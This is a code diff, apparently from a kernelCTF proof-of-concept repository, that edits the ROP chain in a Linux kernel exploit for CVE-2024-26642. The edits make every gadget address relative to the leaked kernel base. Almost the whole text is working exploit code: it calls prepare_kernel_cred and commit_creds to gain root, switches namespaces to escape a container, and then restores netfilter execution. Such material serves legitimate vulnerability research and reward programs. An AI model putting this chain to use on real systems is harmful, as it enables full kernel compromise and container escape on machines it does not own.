google
diff --git a/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit
0 Bytes b/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit
0 Bytes
diff --git a/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/poc.h
+21-21 b/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/poc.h
+21-21
@@ -219,30 +219,30 @@ void setup_rop_chain(struct payload* payload, int64_t kernel_off) {
   int i = 0x20 / 8;
 
   // had some issue with object boundaries. Lets get some more stack space ..
-  rop_chain[i++] = add_rsp_0x88;//kernel_off + ADD_RSP_0X88_RET;
+  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
   i += 0x88 / 8;
-  rop_chain[i++] = add_rsp_0x88;//kernel_off + ADD_RSP_0X88_RET;
+  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
   i += 0x88 / 8;
-  rop_chain[i++] = add_rsp_0x88;//kernel_off + ADD_RSP_0X88_RET;
+  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
   i += 0x88 / 8;
-  rop_chain[i++] = add_rsp_0x88;//kernel_off + ADD_RSP_0X88_RET;
+  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
   i += 0x88 / 8;
 
-  rop_chain[i++] = pop_rdi;//kernel_off + POP_RDI_RET;
-  rop_chain[i++] = init_task;//kernel_off + INIT_TASK;
-  rop_chain[i++] = prepare_kernel_cred;//kernel_off + PREPARE_KERNEL_CRED;
+  rop_chain[i++] = kernel_off + POP_RDI_RET;
+  rop_chain[i++] = kernel_off + INIT_TASK;
+  rop_chain[i++] = kernel_off + PREPARE_KERNEL_CRED;
 
-  rop_chain[i++] = mov_rdi_rax;//kernel_off + MOV_RDI_RAX_RET;
-  rop_chain[i++] = commit_creds;//kernel_off + COMMIT_CREDS;
+  rop_chain[i++] = kernel_off + MOV_RDI_RAX_RET;
+  rop_chain[i++] = kernel_off + COMMIT_CREDS;
 
-  rop_chain[i++] = pop_rdi;//kernel_off + POP_RDI_RET;
+  rop_chain[i++] = kernel_off + POP_RDI_RET;
   rop_chain[i++] = 1;
-  rop_chain[i++] = find_task_by_vpid;//kernel_off + FIND_TASK_BY_VPID;
+  rop_chain[i++] = kernel_off + FIND_TASK_BY_VPID;
 
-  rop_chain[i++] = mov_rdi_rax;//kernel_off + MOV_RDI_RAX_RET;
-  rop_chain[i++] = pop_rsi;//kernel_off + POP_RSI_RET;
-  rop_chain[i++] = init_nsproxy;//kernel_off + INIT_NSPROXY;
-  rop_chain[i++] = switch_task_namespaces;//kernel_off + SWITCH_TASK_NAMESPACES;
+  rop_chain[i++] = kernel_off + MOV_RDI_RAX_RET;
+  rop_chain[i++] = kernel_off + POP_RSI_RET;
+  rop_chain[i++] = kernel_off + INIT_NSPROXY;
+  rop_chain[i++] = kernel_off + SWITCH_TASK_NAMESPACES;
 
   // prepare to restore execution
   // nft_do_chain:
@@ -251,25 +251,25 @@ void setup_rop_chain(struct payload* payload, int64_t kernel_off) {
   //     lea r12, [rsp+0x48]
   //   exit:
   //     ffffffff81e517eb: 89 d0   mov    %edx,%eax
-  rop_chain[i++] = pop_rbp;//kernel_off + POP_RBP_RET;
+  rop_chain[i++] = kernel_off + POP_RBP_RET;
   rop_chain[i++] = 0x220 - 0x48;
-  rop_chain[i++] = lea_rax_r12_plus_rbp_pop5;//kernel_off + LEA_RAX_R12_PLUS_RBP_POP5_RET;
+  rop_chain[i++] = kernel_off + LEA_RAX_R12_PLUS_RBP_POP5_RET;
   i += 5;
 
   // prepare the stack restore gadget
-  rop_chain[i++] = pop_rcx;//kernel_off + POP_RCX_RET;
+  rop_chain[i++] = kernel_off + POP_RCX_RET;
   rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, pop_rsp_jmp_rsi_0xf);
 
   // prepare the return jmp gadget
-  rop_chain[i++] = pop_rsi;//kernel_off + POP_RSI_RET;
+  rop_chain[i++] = kernel_off + POP_RSI_RET;
   rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_do_chain_leave) - 0xf;
 
   // setup the return vaule
-  rop_chain[i++] = pop_rdx;//kernel_off + POP_RDX_RET;
+  rop_chain[i++] = kernel_off + POP_RDX_RET;
   rop_chain[i++] = NF_DROP;
 
   // actually restore execution
-  rop_chain[i++] = push_rax_jmp_rcx;//kernel_off + PUSH_RAX_JMP_RCX;
+  rop_chain[i++] = kernel_off + PUSH_RAX_JMP_RCX;
 }